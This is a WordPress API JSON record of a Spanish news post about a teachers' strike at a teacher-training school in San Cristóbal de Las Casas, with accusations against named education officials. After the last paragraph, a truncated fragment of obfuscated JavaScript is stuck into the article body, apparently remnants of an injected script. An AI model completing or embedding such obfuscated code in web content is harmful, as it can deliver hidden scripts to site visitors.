{"id":4765,"date":"2022-08-30T02:03:12","date_gmt":"2022-08-30T02:03:12","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=4765"},"modified":"2022-08-30T02:03:12","modified_gmt":"2022-08-30T02:03:12","slug":"se-declara-en-paro-de-labores-normal-superior-de-san-cristobal","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=4765","title":{"rendered":"Se declara en paro de labores Normal Superior de San Crist\u00f3bal"},"content":{"rendered":"\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"576\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/08\/WhatsApp-Image-2022-08-29-at-3.48.18-PM-1024x576.jpeg\" alt=\"\" class=\"wp-image-4766\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/08\/WhatsApp-Image-2022-08-29-at-3.48.18-PM-1024x576.jpeg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/08\/WhatsApp-Image-2022-08-29-at-3.48.18-PM-300x169.jpeg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/08\/WhatsApp-Image-2022-08-29-at-3.48.18-PM-768x432.jpeg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/08\/WhatsApp-Image-2022-08-29-at-3.48.18-PM-1536x864.jpeg 1536w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/08\/WhatsApp-Image-2022-08-29-at-3.48.18-PM.jpeg 1600w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p>\u00d3scar G\u00f3mez<\/p>\n\n\n\n<p>San Crist\u00f3bal de Las Casas.- Personal docente de la escuela normal experimental &#8220;Fray Mat\u00edas Antonio de C\u00f3rdova y Ord\u00f3\u00f1ez&#8221;, se declar\u00f3 este lunes 29 de agosto, en paro de labores, por no recibir atenci\u00f3n responsable, justa y digna a sus solicitudes de promoci\u00f3n y adjudicaci\u00f3n dirigidas a la subsecretar\u00eda de educaci\u00f3n federalizada, a la direcci\u00f3n de educaci\u00f3n secundaria y superior, y al departamento de educaci\u00f3n normal, a pesar de haber cumplimentado con todas las indicaciones sugeridas por la autoridad.<\/p>\n\n\n\n<p>\u201cA pesar de haber logrado el consenso suscrito por la comunidad docente, Julio C\u00e9sar Santos Pu\u00f3n, jefe del departamento de educaci\u00f3n normal; bloquea nuestras propuestas con el \u00fanico inter\u00e9s de favorecer a Jorge Enrique Cordero Cancino, docente de medio tiempo de la instituci\u00f3n pasando por encima de los derechos laborales de 14 docentes de nuestra instituci\u00f3n\u201d, dijo Mercedes Cabrera Moreno, docente de la normal.<\/p>\n\n\n\n<p>En conferencia de prensa, se\u00f1al\u00f3 que debido a la falta de compromiso y a los actos de dolo<\/p>\n\n\n\n<p>exclusi\u00f3n, discriminaci\u00f3n, as\u00ed como a la violencia de g\u00e9nero que han recibido, por parte del Julio C\u00e9sar Santos Pu\u00f3n, las acad\u00e9micas de la instituci\u00f3n \u201cno permitiremos ning\u00fan trato con el licenciado en menci\u00f3n, toda vez que lesiona nuestra dignidad y derecho\u201d.<\/p>\n\n\n\n<p>Pidi\u00f3 el cese a la intervenci\u00f3n de Jes\u00fas Emilio Morales Gamboa, quien se autonombra representante sindical de la normal superior, &nbsp;\u201ccon el \u00fanico inter\u00e9s de favorecer a su amigo Jorge Enrique Cordero Cancino y. generar un clima de desestabilizaci\u00f3n en nuestra instituci\u00f3n\u201d.<\/p>\n\n\n\n<p>Exigi\u00f3 la urgente intervenci\u00f3n de las autoridades que tengan capacidad para solucionar este conflicto, lo cual permitir\u00e1 el curso de las actividades escolares en la instituci\u00f3n \u201cexigimos. respeto a los derechos laborales del personal docente de la escuela normal experimental Fray Mat\u00edas Antonio de C\u00f3rdova y Ord\u00f3\u00f1ez&#8221;.<\/p>\n\n\n\n<p>Es de mencionar que durante la toma de la escuela las primeras horas de este lunes, un grupo de estudiantes, rompieron los candados que hab\u00edan colocado los docentes, para poder ingresar, intentando que las clases iniciar\u00e1n con regularidad.<\/p>\n\n\n\n<p>Minutos despu\u00e9s el director de la instituci\u00f3n, habl\u00f3 con los estudiantes, y aceptaron la decisi\u00f3n de los docentes, quedando suspenda las clases hasta nuevo aviso, y esperan que las autoridades educativas tomen cartas en el asunto.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>\u00d3scar G\u00f3mez San Crist\u00f3bal de Las Casas.- Personal docente de la escuela normal experimental &#8220;Fray Mat\u00edas Antonio de C\u00f3rdova y Ord\u00f3\u00f1ez&#8221;, se declar\u00f3 este lunes 29 de agosto, en paro de labores, por no recibir atenci\u00f3n responsable, justa y digna a sus solicitudes de promoci\u00f3n y adjudicaci\u00f3n dirigidas a la subsecretar\u00eda de educaci\u00f3n federalizada, a &hellip;<\/p>\n","protected":false},"author":2,"featured_media":4766,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[7,17],"tags":[],"class_list":["post-4765","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-chiapas","category-portada"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/4765","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=4765"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/4765\/revisions"}],"predecessor-version":[{"id":4767,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/4765\/revisions\/4767"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/4766"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=4765"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=4765"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=4765"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}